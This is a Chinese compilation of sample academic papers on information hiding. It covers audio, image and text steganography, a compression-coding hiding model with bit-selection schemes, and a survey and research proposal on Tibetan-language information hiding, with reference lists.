引論:我們為您整理了13篇隱藏技術論文范文,供您借鑒以豐富您的創作。它們是您寫作時的寶貴資源,期望它們能夠激發您的創作靈感,讓您的文章更具深度。
篇1
信息隱藏技術防御攻擊的能力一定要很高,因為,網絡通信中,信息技術會經常受到有意或無意的攻擊,比如刪除、非法攻擊或篡改等,都會對隱藏的信息造成損害,因此,信息隱藏技術必須具備高的防御能力。此外,網絡通信中經常出現信號處理,如調制、有損壓縮、濾波等,也會對隱藏的信息造成破壞,所以,為了保障信息的安全,信息隱藏技術一定要擁有更強大的防御攻擊的能力。
3、信息隱藏技術的嵌入量大
信息隱藏的目的是為了無法被其他人或電腦發現,為了提高信息隱藏的技術,要將需要隱藏的信息放入一個相對數據量大的載體中,因此,信息隱藏要選擇一個信息量大的數據中。此外,還要滿足隱藏算法所需要的空間,從而保證信息隱藏的無法識別,保證信息的安全。
4、信息隱藏技術的自我恢復
信息隱藏后一旦需要提取,要能夠不需要原始載體信號,便可以從載體中將隱藏的信號提取出來,保證信息的完整。另外,將隱藏的信息提取出來后,要保證信息經過一系列的提取過程后,仍能保證信息的完好無損,有效保證信息的安全性。因此,信息隱藏技術必須要有高度的自我恢復能力。
二、網絡通信中信息隱藏的技術途徑
1、信息隱藏于音頻信號中
將信息隱藏于音頻信號中,是將嵌入信息所采用的域為依據,可將語音信息隱藏劃分為時域音頻隱藏、頻域音頻隱藏、離散余弦變換域音頻隱藏三種。時域音頻隱藏技術就是將音頻信號的頻率、幅度或結果進行處理,然后將其隱藏于音頻信號中,是一種簡單的隱藏技術。頻域音頻隱藏技術是將要隱藏的音頻文件根據頻域的區域進行處理,將需要隱藏的信息以偽噪聲的方式嵌于音頻信號中,從而達到隱藏的目的,并且很難被識別和發現。離散余弦變化域音頻隱藏技術是需要隱藏的信息變換格式,再將變換后的信息嵌于音頻信號中,起到深度隱藏的目的。此外,隨著網絡技術的發展和不斷創新,音頻信號隱藏還包括小波域隱藏技術和壓縮域隱藏技術,效果都很好。
2、信息隱藏于圖像信號中
信息隱藏于圖像信號中主要有兩種方式,一是空間域隱藏技術,就是利用空間替換法,將需要隱藏的信息替換到載體中,并且嵌入不重要的位置,例如將秘密信息嵌入像素點最低的有效位,實現信息的替換,從而保證信息的安全性;二是變換域隱藏技術,就是將需要隱藏的信息轉換到變換域范圍,變換域是一直在變動的,因此,秘密信息進入變換域后悔進行反復變換,從而使得信息隱匿其中,很難被發現。變換域隱藏技術相比于空間域隱藏技術擁有更好的隱藏效果,并且安全性高、防御攻擊力強、自我恢復好,更適合信息的隱藏。
3、信息隱藏于文本信號中
信息隱藏于文本信息中,主要是將信息拆分為極其細碎的結構,然后將每個小部分分別隱藏于文本信息中,從而起到信息隱藏的目的。但是,文本信號需要龐大的數據量才能實現更好的信息隱藏,因此,在實際的應用中,應用率很低。此外,在網絡通信中,音頻信號隱藏技術和圖像信號隱藏技術的隱蔽性遠遠好于文本信號,所以,文本信號隱藏信息的使用率低;同時,也由于文本信號的防御能力差、自我修復力也差,使得文本信號隱藏信息的安全性降低,不利于信息的隱藏。
篇2
信息隱藏是一門新興的信息安全技術。論文參考。涉及感知學,信息論,密碼學等多個學科領域,涵蓋信號處理,擴頻通信等多專業技術。 近年來得到了迅猛發展。現階段人們一般選擇圖像、文本、音頻和視頻等數字媒體作為載體。另外, 還出現了基于TCP/IP 的信息隱藏技術和基于信道編碼的信息隱藏技術。本文研究的基于壓縮編碼的信息隱藏技術是信息隱藏技術的新領域, 它以多媒體系統中的壓縮數據作為嵌入載體,數據解壓后不影響原始數據數據的結構和統計特性, 具有較強的魯棒性和不可檢測性。
2 壓縮編碼信息隱藏的原理
壓縮編碼是一種提高數據傳輸有效性的技術,它是通過對數據施加某種操作或變換使之長度變短或者容量變小的同時, 還必須保證原始數據能夠從壓縮產生的壓縮碼中得以精確的還原。從信息論的角度來看,壓縮就是去掉信息中的冗余,即保留不確定的信息,去掉確定的信息(可推知的),也就是用一種更接近信息本質的描述來代替原有冗余的描述。這個本質的東西就是信息量(即不確定因素)。信息隱匿和數據壓縮在本質上是相互聯系的:對于數據壓縮來講,一塊數據中隱匿了和數據本身無關的地的其它數據,那這塊隱藏了信息的數據是有一定冗余的,由冗余的數據可以進一步被壓縮,進一步壓縮的就有可能去掉隱匿的數據;對于信息隱匿來說,一塊已被壓縮過的數據冗余量已經很小了,由于隱匿是嵌入的數據和原始數據毫無關系,在這塊數據中進一步隱匿數據,勢必造成原始掩護數據的有效數據的減少,相當于隊已經壓縮的數據進行進一步壓縮。只要保證在接收端解壓中可以恢復原始數據的差錯率,就可以在壓縮編碼后進行信息隱匿,不會引起截獲者懷疑碼字載體中含有秘密信息。
3 壓縮編碼信息隱匿模型實現方案
基于信息隱匿和數據壓縮的關系,提出結構如下的數據壓縮思想的通用隱匿模型。模型主要由三個部分組成:圖像壓縮、信息加密和信息隱匿。圖像壓縮部分的量化器輸出至信息隱匿部分,然后從信息隱匿部分得到隱藏有其他信息的量化數據,并送到熵編碼器,其他內容和標準壓縮過程一致。信息加密部分為傳統的加密方案,其主要目的是增加秘密信息的安全性,使得系統隱匿的信息部分即使被檢測出來,也不會泄露其內容。論文參考。
信息隱匿部分是模擬最核心的內容,這部分主要有三個部分組成:數據變換,數據選擇和嵌入過程。數據變化的主要目的是改變加密后的信息統計特性,使得這些數據嵌入掩護圖像量化后的數據之中,不改變或很少改變掩護圖像的數據統計特性,從而使信息隱匿后的抗檢測性大大增強。數據選擇是從掩護圖像量化后的數據中選擇合適的比特位,用它來隱藏已加密的信息。合理的數據選擇算法應該兼顧信息隱匿的容量,信息隱匿的抗檢測性與魯棒性。嵌入過程式將加密后的信息和選擇出來的數據進行某種運算(通稱為替換或異或),用運算結果替換選擇出來的數據,并將此數據連同未選擇出來的量化數據一并交給圖像壓縮部分的熵編碼進行編碼。
圖1 基于數據壓縮思想的通用信息隱匿模型
通用模型的秘密信息提取過程基本上是隱匿的逆過程,其流程圖如下
圖2通用信息隱匿模型的信息提取過程
壓縮后的數據首先經過熵解碼器解碼,然后進行數據分離,將未嵌入的數據部分送入正常的圖像解碼流程(反量化,反映射變換),而將嵌入數據的部分進行數據提取,如果此過程的算法不是盲的(即需要原始掩護圖像),則需要分離出來的數據和原始掩護圖像經映射變化,量化后的數據進行運算,將結果進行數據恢復、解密、最后得到嵌入的原始秘密信息。
4 隱匿模型的兩種關鍵技術
在這種通用的信息隱匿模型中,數據變換和數據選擇是關鍵技術
數據變換的主要目的是改變加密后的信息統計特性,增強系統信息隱匿的抗檢測性能。改變數據的統計特性的常用方法是進行線性濾波,從本質上來講,線性濾波和線性變換是一致的,從頻域上來看,濾波就是對信號頻譜的不同部分進行不同的縮放。在技術上常就是這樣一個過程:DFT→相乘→IDFT,將這一過程合并為一體時,就成為一個單純的線性變換。在復數域中進行整數的可逆處理時,數據量就會增加一倍,為此可以經DFT換成DCT,這樣這一處理過程就成為一實數域的線性變換問題。
下面介紹整型變換算法的基本過程。
(1)對于給定的線性變換A,如是常見的線性變換,則進行(2),否則對其進行改造,使det| A ‘ |=1。
(2)將A ‘ 分解為3類基本矩陣(置換矩陣,元素的絕對值均不小于1的對角陣,單位三角矩陣)。
(3)對于每一基本矩陣,構造其整型變換,獲得整數輸出。
(4)對于每一步都應有相應的逆變換,所以整個變換的逆變換可以相應的獲得。
(5)對于多維可分離的線性變換,正變換可以逐維的計算;為了保證逆變換對于多維數據的完全重建,應嚴格按照和正變換相反的次序進行逆變換。
實現數據變換時的另一個問題是數據的范圍問題。在實際處理過程中,輸入的數據都是有一定的范圍的(比如原始圖像數據通常用8位無符號數據表示),如果輸出的數據不加以限制,則輸出的數據的范圍一般要增大,這樣就必須用更多的數據表示處理結果。
數據選擇過程是從掩護圖像的量化數據中選擇合適的比特位,用它來隱匿已加密的信息。最基本的做法是選擇掩護數據中的不重要的部分,這樣做得優點是對掩護圖像的質量影響最小,使修改引起別人注意的可能性最小。但是在實際系統中,數據選擇算法應該兼顧信息隱匿的容量,信息隱匿的抗檢測性與魯棒性等多個方面的性能,可以選擇下面三種。
1.LSP(LeastSignificant Portion)最不重要部分
LSP技術和LSB(最不重要比特位)技術基本類似,區別在于LSB平等的對待掩護圖像中的每一字節,不同的字節之間沒有區別,在隱藏時都在數據的最低位取相等比特;而LSP針對變換量化后的數據而言,不同位置的重要程度不同,從中所取的最低有效比特數就不同,其中低頻數據是取得少一些,而在高頻數據中取得多一些。另外,不同位置的數據取值范圍也不一樣,最多的可取比特數也不一樣。論文參考。
2.隨機間隔法
隨機間隔技術是以LSP為基礎的一種方法,在數據選擇時用一個掩密密鑰k作隨機數發生的種子,那么可以生成一個隨機序列k 1 ,…,k l ,并且把它們一起按下列方式生成隱匿信息位置來對經LSP選擇的數據進行進一步選擇:j 1 =k 1
j i =k i +j i-1
從而可以偽隨機決定兩個嵌入位置的距離。這種方法由于隱匿的位置更少,所以更不容易被檢測出來。
3.隨機位置法
隨機位置技術是另外一種偽隨機的方法,它也以LSP技術為基礎。和隨機間隔法不同的是,它對不同的位置變換數據及量化數據的不同比特位賦予不同的選擇概率p 1 ,…,p l ,在數據選擇時也用一個偽裝密鑰k作為隨機發送的種子,那么可以生成一個一個隨機序列k 1 ,…,k l ,當k i ≥p i 時選擇比特,否則不進行選擇。在此方法中選擇合適概率取值方案可以兼顧信息隱匿的容量、懸念吸引你的抗檢測性與魯棒性等多方面的性能,是一種更靈活的方法。當然可以將隨機間隔法和隨機位置發結合起來使用,那是一種更靈活、更復雜的方案。
5 實驗結果
運用本文提出的通用模型,以lena(512像素×512像素),作為掩護圖像,在其中隱匿隨機數據,映射變換采用8×8的DCT,經數據變換過程,結果如下圖所示。圖中從左到右,從上到下依次為:原始圖像,未嵌入數據的JPEG圖像,嵌入不等數據量的JPEG圖像。隨著嵌入數據量的增加,掩護圖像的直觀質量會下降,這種質量的下降類似于不同壓縮比條件下JPEG圖像質量的不同下降,從信息隱匿的角度來看,這種相似性是有利的。
圖3 圖用模型的數據隱匿效果
6 小結
研究了一種基于壓縮編碼的信息隱匿技術,介紹了信息隱匿通用模型的兩種關鍵技術:數據變換和數據選擇技術,通過實驗得到嵌入量與圖像質量的關系。隨著通信技術的不斷發展,信息安全將成為一門很重要的學科,對于通信信息隱匿還要尋找更先進,更合理的算法來達到通信的安全性能。
參考文獻:
[1] KATZENBEISSERS, PETITCOLASFAP.信息隱藏技術—隱寫術與數字水印[M].吳秋新,鈕心忻,楊義先等譯.北京:人民郵電出版社,2001.
[2] 汪小帆,戴躍偉. 信息隱藏技術方法與應用[M].北京:機械工業出版社,2001.
[3]柏森,胡中豫,吳樂華等.通信信息隱匿技術[M].北京:國防工業出版社,2005.
篇3
0 引 言
安全、有效的信息傳輸對國家安全、社會穩定和人民安居樂業至關重要。網絡和多媒體技術的發展,使得信息傳輸的速度和數量正以驚人的增量發展。然而,信息傳輸的便利在方便人們的同時也給信息安全帶來了隱患,同時也為基于數字載體的秘密信息傳輸提供了廣闊的研究空間。目前,基于載體的秘密信息傳輸是信息安全領域的一個方興未艾的研究熱點。而基于載體預處理的藏文信息隱藏技術將為信息安全領域提供一些新的數字信息共享和傳輸理念,特別是藏文的預處理規律、在數字信息中的隱藏規律等,將有助于涉藏秘密通信技術的發展,并可以對民用和商用領域中涉及到藏文內容的傳輸、共享、存儲和提取的通信過程起到安全保護、版權保護及完整性認證的作用,并對國家涉藏領域的網絡輿情監控、國內外涉藏敏感信息標注和情感色彩認知起著至關重要的作用。
在藏文信息隱藏技術方面,目前主要涉及的技術有關鍵字識別、字符識別和提取、韻律認知、語義角色標注、文本資源挖掘和語料抽取等,并以此為基礎進行置亂優化。
1 國內外信息隱藏技術研究現狀
信息隱藏一直是信息安全領域中保障隱秘信息安全傳輸和數字信息版權的重要手段,也是近年來國內外學者研究的熱點之一。最新的一屆ACM信息隱藏和多媒體安全會議(ACM IH&MMSec’13 Workshop)的主要研究內容有信息隱藏算法、多媒體水印和認證、載體運算域的數字信號處理等。其中,信息隱藏算法的設計首先依賴于載體的選擇和預處理;關于多媒體水印和認證的研究則將信息隱藏和數字水印的載體范圍從數字圖像等常見載體拓展到了包括三維模型在內的新型載體上;載體運算域的數字信號處理涉及到了載體預處理時所用的具體方法,如空間域或變換域等。2013年IEEE 圖像處理國際會議(IEEE ICIP 2013)的主要研究內容包括圖像、音視頻和3-D等多媒體的信息隱藏算法和多媒體特征提取和分析等,這兩類研究內容均與載體的選取和預處理有關。最新一屆信息隱藏國際會議(IH2012)的主要研究內容包括多媒體安全和其他載體的信息隱藏。我國的第十一屆全國信息隱藏暨多媒體安全學術大會(CIHW2013)中關于信息隱藏算法的研究內容也主要集中在非常規載體的分析和預處理上。
藏文作為信息隱藏領域一種新的信息格式,對其研究主要局限于藏文操作系統、藏文信息技術標準、藏文信息處理等幾個方面[1],具體內容集中在藏文編碼字符集、術語集、拼音輔助集等的建立。
基于載體的秘密通信技術是20世紀90年代中期發展起來的跨領域的學科,而載體的預處理技術一直是其研究的主要方向。對隱藏載體進行預處理,生成信息隱藏嵌入區域是信息隱藏算法中最重要的研究內容之一。從上述國內外各學術會議中關于信息隱藏的參會論文和研討情況看,各類載體固有特性的研究對預處理技術有著重要的意義,且數字圖像依然是主要的一類載體,而三維模型將是未來主要研究的一類非常規載體。下面就對數字圖像和三維模型兩類載體的預處理技術的研究現狀進行闡述。
1.1 數字圖像預處理技術研究綜述
基于數字圖像的信息隱藏技術是信息隱藏學科中重要的技術分支,是目前應用最廣、覆蓋范圍最大的信息隱藏技術手段。在基于數字圖像的信息隱藏技術研究中,信息隱藏區域的生成是關系算法性能的重要因素。信息隱藏區域的生成方法主要包括空間域生成法、變換域生成法以及空間域和變換域聯合的生成方法。
空間域算法:作為空間域算法中出現最早、操作最簡單且應用最廣泛的算法,基于位平面分解理論的LSB算法可以直接替換的方式隱藏較大的數據量,劉紅翼等提出的一種LSB算法具有容量大、運算量小的特點[2];劉文彬等提出的LSB隱寫替換的消息定位方法則可以對此類算法進行檢測[3];而IH2012的論文中,有學者運用假設檢驗理論和含秘載體的奇偶感知特性可有效地檢測LSB算法所隱藏的隱秘信息[4,5],這些研究為藏文信息隱藏中涉及到關于此類算法的抗檢測性研究提供了新的待改進方向。張焱等提出的像素值排序和趙彥濤等提出的直方圖修改等空間域算法在沿用LSB直接替換的隱藏理念的同時,還提升了魯棒性,因此也被廣泛用于數字圖像載體預處理[6,7];隨后,楊春芳等提出了針對此類算法的檢測方法[8],這也為針對此類算法抗檢測性改進的研究提供了重要依據。此外,上述同類算法中的載體子區域劃分思想、內容自適應思想等也對本項目基于載體結構特性建立空間匹配模型的機制提供了方法學上的有力支持[9-13]。
變換域算法:不同于空間域算法直接對載體的空間特性進行修改,變換域預處理方法以修改載體的頻率參數來隱藏信息[14],因此算法的魯棒性比空間域算法好。在此基礎上,唐燕等又對隱秘信息的檢測和恢復進行了研究和改進,實現了幾乎無需原始參量的半盲提取[15]。盡管變換域算法不具備空間域算法容量大、運算量小和易操作等優勢,但是變換域中的多小波理論因其同時具有對稱性、短支撐性、二階消失矩和正交性等特性成為了信號處理中有明顯優勢且較常用的方法,在前期研究中利用多小波方法將數字圖像載體分塊后作為嵌入區域,提高了算法的魯棒性和不可見性[16,17],這種方法為在藏文信息隱藏研究中建立基于區域能量的階梯性分布機制提供了一種研究手段。
混合域算法:較單獨運用一種空間域或變換域生成隱藏區域并設計信息隱藏算法來看,基于空間域與變換域聯合的信息隱藏算法可以兼有多種算法的性能優勢。在基于空間域和變換域聯合的信息隱藏算法中,空間域的作用體現在數據嵌入的具體操作方面,因為隱藏的實質就是在當前環境下的空間分量上進行數據修改,利用邊緣像素值差分(Edged Pixel Value Differencing,EPVD)將載體換算為若干個像素塊,以最大斜角的數據修改作為信息隱藏的具體方法[18];利用濕紙碼和基于LSBM的雙層隱寫來對載體進行加1嵌入或減1嵌入[19];另外,國內外許多學者利用調色板理論進行數據嵌入[20,21]。而變換域在載體預處理中的主要作用是生成滿足特定需要的信息隱藏環境(區域),主要包括變換后的系數分布以及n階分量子圖等。如對RSV顏色空間的V分量做DCT變換,分塊后作為嵌入區域[22];利用視覺顯著點技術確定跟蹤窗(Regions of Interest,ROI),在ROI的DCT系數上嵌入隱藏信息,并指定某個ROI邊緣地圖脆弱性標識,嵌入到DWT變換后的含密圖像中[23];前期研究中,研究人員利用自適應顏色遷移理論中lαβ域對顏色的控制力,消除了RGB顏色分量的強相關性,并結合GHM能量分區隱藏信息,在不可見性、嵌入信息量和魯棒性方面均具有較好的表現[24]。
1.2 三維模型預處理技術研究綜述
潘志庚等將基于三維模型的信息隱藏預處理方法主要分為空間域算法和變換域算法[25]。這也這為藏文信息隱藏研究提供了新的思路和方法。
空間域算法:空間域算法通常具有易嵌入和盲提取的特點,如直接置換載體的幾何信息來隱藏數據是三維模型載體信息隱藏最原始、最直接的方法[26]。為改進此類算法的魯棒性,引入仿射不變量是有效的措施,如利用具有連續解析性的仿射不變量優化需要置換的頂點[27]、 將穩態錨點通過三角垂心編碼解析為聚類元素從而嵌入隱秘信息[28]。此外,基于主元分析的算法也有助于改善空間域算法的魯棒性,例如可根據主元分析(Primary Component Analysis,PCA)來確定模型的關鍵位置作為魯棒區域,并用網格分割法改進魯棒性和不可見性[29-32]。這類算法也為藏文信息隱藏從載體結構特性進行解析和預處理提供了理論依據。改進型的空間域算法多針對魯棒性或容量性有所提升,如基于連續解析性的體積矩的盲算法,改善了之前算法對連通性攻擊的魯棒性[33];通過重排頂點和面片在網格文件中的表示信息,利用表示域內的信息進行嵌入使算法具有良好的不可見性和大容量性[34],但對相似變換以外的攻擊不具有魯棒性。
變換域算法:三維模型預處理的變換域方法大多利用頻譜分析將模型信息參數化[35],對參數進行少量修改后以隱藏信息,其中,基于小波變換的算法可以對規則和非規則網格模型進行小波域參量修改以嵌入較多信息[36]。理論上,變換域算法比空間域算法魯棒性強,但由于三維模型頂點的天然無序性和不規則性,對其進行頻譜分析難度大,導致變換域算法實用性目前較低,因此空間域算法依然是比變換域算法更有實用價值的研究方向[37]。
2 藏文信息隱藏技術研究現狀
目前反映藏文信息處理技術最新進展的文獻較少,綜合以已有的研究成果及相關研究文獻,藏文信息處理可劃分為藏語信息處理和藏字信息處理兩個層次[38,39]。藏語信息處理包括機器翻譯、信息檢索、信息提取、文本校對、文本生成、文本分類、自動摘要以及藏文字識別和語音識別的后處理等等;而藏字信息處理包括操作系統以及編碼字符集、輸入技術、字形描述與生成、存儲、編輯、排版、字頻統計和藏字屬性庫等。這些研究基礎對藏文信息隱藏技術的發展至關重要,是基于載體預處理的藏文信息隱藏的主要技術來源。鑒于藏文的獨特構造,以及藏文的特點,目前對藏文秘密信息的預處理技術一般指置亂和加密算法的選擇[40],而置亂使信息變得雜亂無章難以辨認,可以起到加密與改變信息嵌入特性的作用。可用于藏文信息隱藏的置亂算法主要有Arnold變換、幻方矩陣、Gray碼變換、混沌序列等方法[41]。其中,Arnold變換算法簡單且置亂效果顯著,使有意義的數字圖像變成像白噪聲一樣的無意義圖像,實現了信息的初步加密和信息結構的調整,在嵌入信息為數字圖像時可以很好的應用[42]。幻方置亂的思想基于查表思想,基于數字圖像的幻方置亂可降低幻方置亂階數或以圖像塊進行置亂,實現置亂效果與系統開銷的平衡[43]。Gray是一種具有反射特性和循環特性的單步自補碼,它的循環、單步特性消除了隨機取數時出現重大誤差的可能,它的反射、自補特性使得求反非常方便[44]。混沌的優勢在于對初始條件的極端敏感和軌跡在整個空間上的遍歷性。根據經典的Shannon置亂與擴散的要求,這些獨特的特征使得混沌映射成為信息隱藏嵌入算法的優秀候選[45]。上述傳統的置亂算法一般用于正方形圖像處理,而經過改進的Arnold算法可直接用于寬高不等的矩形圖像而不必進行正方形擴展[46],這也將是藏文信息隱藏技術所采用的主要置亂方法之一。
3 藏文信息隱藏技術的研究目標、研究內容和要解決的問題
3.1 研究目標
面向藏文安全通信的高性能信息隱藏算法是目前藏文信息隱藏技術的主要目標,包括提出性能出色的、適合藏文通信要求的信息隱藏算法;提出一種具有普適性的高性能信息隱藏嵌入區域生成原則和嵌入規則:
(1) 基于數字圖像的藏文信息隱藏算法:提出至少兩種基于數字圖像的藏文信息隱藏算法,算法將同時滿足面向藏文安全的信息隱藏應用所要求的高不可見性(PSNR≥34.90dB)、強魯棒性(抗擊大約69%以下的JPEG2000壓縮、35%以下的剪切及常見濾波與加噪)、大容量性(基于彩色圖像的信息隱藏信息嵌入率≥18%)以及高感知篡改性(檢測隱藏數據是否被篡改能力≥95%)。
(2) 基于三維模型的藏文信息隱藏算法:提出至少一種基于三維模型的藏文信息隱藏算法。算法將同時滿足面向藏文安全的信息隱藏應用所要求的高不可見性(RSNR≥69.94dB、En≥70%)、應對一般攻擊的強魯棒性(抗擊大約0.10%隨機加噪、50-times Laplacian平滑、50%均勻重網格化以及均勻簡化等)、大容量性(相對理想的RSNR,嵌入率≥29%)以及低復雜度(根據載體模型幾何信息量而變化)。
(3) 普適性信息隱藏嵌入區域生成原則和嵌入規則:利用載體圖像能量和復雜度特性,提出基于能量性和復雜度的藏文信息隱藏區域生成原則和嵌入規則,將適應于所有對數字圖像處理后有能量區別的圖像處理方法,指導設計者利用能量與魯棒性、復雜度與不可見性的對應關系,研究出同時滿足不可見性和魯棒性的信息隱藏算法。
3.2 研究內容
(1) 藏文信息隱藏區域生成原則與規則研究:數字圖像信息隱藏技術的研究核心集中在隱藏區域和嵌入規則的設計上,藏文信息隱藏算法的設計方法和思路就是在選定藏文信息隱藏區域以及制定好信息隱藏規則后,按照一定的順序將兩者進行合理的組織,所以研究藏文信息隱藏區域生成原則以及信息隱藏規則是重點。
(2) 基于數字圖像的藏文信息隱藏算法研究:隱藏算法是基于數字圖像的信息隱藏技術的研究核心,需按照嵌入域進行劃分,對基于空間域和基于變換域的信息隱藏算法分別進行研究,提出單獨基于空間域、單獨基于變換域以及兩者聯合應用的數字圖像信息隱藏算法。
(3) 基于三維模型的藏文信息隱藏算法研究:首先對三維模型的結構特性和能量特性進行研究,再根據載體模型的特性找出對應的預處理方法。在研究基于空間域和基于變換域的信息隱藏算法的基礎上,提出改進型的三維模型信息隱藏算法。主要用于提升載體有效嵌入容量和降低載體視覺失真度。
(4) 載體與藏文秘密信息的一致化方法研究:基于上述研究基礎,生成結構和能量差異化子區域,再將藏文秘密信息按照拼音屬性進行解析生成信息序列。再利用優化算法使得預處理后的載體信息和藏文秘密信息的解析編碼獲得最大一致化,從而提高算法性能。
3.3 需解決的關鍵問題
綜合已有的研究,在藏文信息隱藏技術方面,目前需要解決的問題有以下幾個方面:
(1) 信息隱藏區域與嵌入規則設計:在具有什么性質的區域內應用什么樣的規則進行藏文信息隱藏才可以解決“不可見性與魯棒性的對立、容量性與抗分析性的對立”問題,是藏文信息隱藏研究領域的關鍵技術之一。需找出隱藏區域的性質與信息隱藏性能的關系,提出面向藏文信息傳輸的信息隱藏區域選擇的原則與方法;給出在具有具體性質的嵌入區域中的藏文信息隱藏嵌入規則的制定原理和方法;提出大量的藏文信息數據轉換思想與方法,以提供形式多樣的信息隱藏嵌入規則。
(2) 數字圖像載體預處理方法:①多小波理論在載體預處理中的應用。對于數字圖像經過多小波變換后所具有的特殊性質,找出多小波變換后數字圖像所具有的能量特性與基于數字圖像信息隱藏算法性能之間所遵循的規律已有學者進行研究。②顏色空間的性能分析與應用選取。RGB、CMYK、lαβ、YUV以及HSx顏色空間,應用方法以及應用各有優劣勢。該技術的應用難點在于為顏色空間在藏文信息隱藏的應用提出完備的應用方案,因為這些顏色空間在藏文信息隱藏技術中的應用目前非常少,應用優劣還處于實驗驗證階段,沒有理論驗證的支持。
(3) 三維網格模型載體預處理方法:骨架抽取和內切球解析技術在藏文信息隱藏算法中的應用。這種方法不涉及頂點數量及坐標的改變和拓撲關系的修改。難點在于尋找一個理想的仿射不變量作為輔助參數以彌補算法對縮放攻擊的脆弱性。
(4) 藏文的置亂與遺傳優化算法:有的藏文字處理系統把藏文看成是由30個輔音、4個元音、3個上加字、5個下加字共42個藏文字符組成的,而有的則認為由其他數量的字符組成。基于對藏文中加字對發音的影響規律的研究,利用字符與二進制碼的解析規則和置亂與優化技術對信息置亂,達到隱藏信息與載體信息的最大匹配度也是一個技術難點。
4 藏文信息隱藏技術研究的新方法
(1)利用載體圖像能量和復雜度特性,提出基于能量性和復雜度的藏文信息隱藏區域生成原則和嵌入規則。高能量與強魯棒、高復雜度與高不可見性的對應關系,從根本上解決藏文信息隱藏算法中不可見性和魯棒性的對立問題,為面向藏文通信安全的信息隱藏算法的設計給出一種普適性方法。
(2)根據數字圖像信息隱藏嵌入區域的生成原則和嵌入規則,提出新的、高性能的數字圖像的藏文信息隱藏算法。算法利用lαβ等顏色空間轉換以及多小波對載體圖像進行的處理,生成具有不同能量特性的嵌入區域,從頻率域上滿足藏文信息隱藏的應用要求;通過對載體圖像進行顏色遷移、矢量解析以及環形處理,從數字圖像的空間結構上滿足藏文信息隱藏的應用要求。
(3)提出滿足三維模型結構特性和能量特性的藏文信息隱藏算法。算法利用局部高度理論和均值偏移理論對載體模型進行預處理,生成具有不同能量特性的嵌入區域,從頻域上滿足信息隱藏的應用要求;通過對載體圖像進行骨架抽取、內切球解析,從空間結構上滿足藏文信息隱藏的應用要求。
參考文獻
[1]陳玉忠,俞士汶. 藏文信息處理技術的研究現狀與展望[J]. 中國藏學. 2003(4):97-107.
[2]劉紅翼,王繼軍,韋月瓊,等.一種基于LSB的數字圖像信息隱藏算法[J].計算機科學,2008, 35(1):100-102.
[3]劉文彬,劉九芬.一種針對LSB替換隱寫的消息定位方法[J].信息工程大學學報,2013,14(6):641-646.
[4] R. Cogranne, C. Zitzmann, F. Retraint,et al. Statistical Detection of LSB Matching Using Hypothesis Testing Theory[C].In: Proceedings of the 14th International Conference on Information Hiding,2013.
[5] J. Fridrich, J. Kodovsky. Steganalysis of LSB Replacement Using Parity-Aware Features[C]. In: Proceedings of the 14th International Conference on Information Hiding, 2013.
[6] 張焱,張敏情,甕佳佳.基于直方圖對的大容量信息隱藏算法[J].計算機應用研究,2013,30(7):2108-2111.
[7] 趙彥濤,李志全,董宇青.基于排序和直方圖修改的可逆信息隱藏方法[J].光電子.激光,2010,2(1):102-106.
[8] 楊春芳,劉粉林,羅向陽.基于相對熵的直方圖差異與JPEG隱寫的定量分析[J].計算機研究與發展, 2011,48(8):1563-1569.
[9] 熊志勇,王江晴.基于差分直方圖平移的彩色圖像可逆信息隱藏[J].四川大學學報,2011,43(3): 81-89.
[10] Z.H. Wang, C.F. Lee, C.Y. Chang. Histogram-shifting-imitated reversible data hiding[J]. The Journal of Systems and Software, 2013,86(2): 315-323.
[11] X.L. Li, J. Li, B. Li, et al. High-fidelity reversible data hiding scheme based on pixel-value-ordering and prediction-error expansion[J].Signal Processing,2013, 93(1): 198C205.
[12] X.T. Wang, C.C. Chang, T.S. Nguyen, et al. Reversible data hiding for high quality images exploiting interpolation and direction order mechanism[J]. Digital Signal Processing, 2013,23(2): 569C577.
[13] Nabin Ghoshal, Anirban Goswami, H. S. Lallie. Adaptive Steganography for Image Authentication Based on Chromatic Property[C]. In: Proceedings of the International Conference on Frontiers of Intelligent Computing: Theory and Applications (FICTA),2013.
[14]和紅杰,張家樹.對水印信息篡改魯棒的自嵌入水印算法[J].軟件學報,2009,20(2):437-450.
[15] 唐燕,閭國年,殷奎喜.規范類正交矩陣的信息隱藏算法[J].東南大學學報,2013,43(1):45-49.
[16] T. Zhang, D.J. Mu, S. Ren, et al. Study of reversible information hiding scheme based on CARDBAL2 and DCT[C].Proceedings-2010 3rd IEEE International Conference on Broadband Network and Multimedia Technology (IC-BNMT2010),2010.
[17] T. Zhang, D.J. Mu, S. Ren. A Confidential Communication-Oriented Information Hiding Algorithm based on GHM multi-wavelet and DCT[J].Applied Mathematics & Information Sciences,2013, 7(5): 1803-1807.
[18] H.B. Kekre, P. Halarnkar, K. Dhamejani. Capacity increase for information hiding using maximum edged pixel value differencing[J].Communications in Computer and Information Science,2011, 145(1): 190-194.
[19] 奚玲,平西建,張韜.整數小波域濕紙碼自適應信息隱藏算法[J].計算機輔助設計與圖形學學報,2011,2(7):1217-1223.
[20] H. Zhao, H.X. Wang, M.K. Khan. Steganalysis for palette-based images using generalized difference image and color correlogram[J].Signal Processing, 2011,91(11): 2595-2605.
[21] A. Lamgunde, A. Kale. Palette based technique for image steganography[J].Communications in Computer and Information Science, 2011,125(2): 364-371.
[22] Y.J. Qiu, H. T. Lu, N. Deng, et al. A robust blind image watermarking scheme based on template in Lab color space[C].2011 International Conference on Computing, Information and Control(ICCIC 2011),2011.
[23] L.H. Tian, N.N. Zheng, J.R. Xue, et al. An intergrated visual saliency-based watermarking approach for synchronous image authentication and copyright protection[J].Signal Processing:Image Communication,2011,31(2): 9-64.
[24] 任帥,張|,慕德俊,等.基于GHM多小波與自適應顏色遷移的信息隱藏算法研究[J].西北工業大學學報,2010,28(2):64-269.
[25] 潘志庚, 孫樹森, 李黎.三維模型數字水印綜述[J].計算機輔助設計與圖形學學報,2006,18(8):1103-1110.
[26] S.H. Lee, K.R. Kwon. VRML animated model watermarking scheme using geometry and interpolator nodes[J].Computer-Aided Design,2011,43(8): 1056-1073.
[27] M. Luo, A.G. Bors. Surface-preserving robust watermarking of 3-D shapes[J].IEEE Transactions on Image Processing, 2011,20(10): 2813-2826.
[28] L. Du, X.C. Cao, M.H. Zhang, et al. Blind Robust Watermarking Mechanism Based on Maxima Curvature of 3D Motion Data[C]. In: Proceedings of the 14th International Conference on Information Hiding,2013.
[29] Z.Q. Yao, R.J. Pan, F.H. Li, et al. A mesh partitioning approach for 3D mesh oblivious watermarking[J].Chinese Journal of Electronics, 2010,19(4): 651-655.
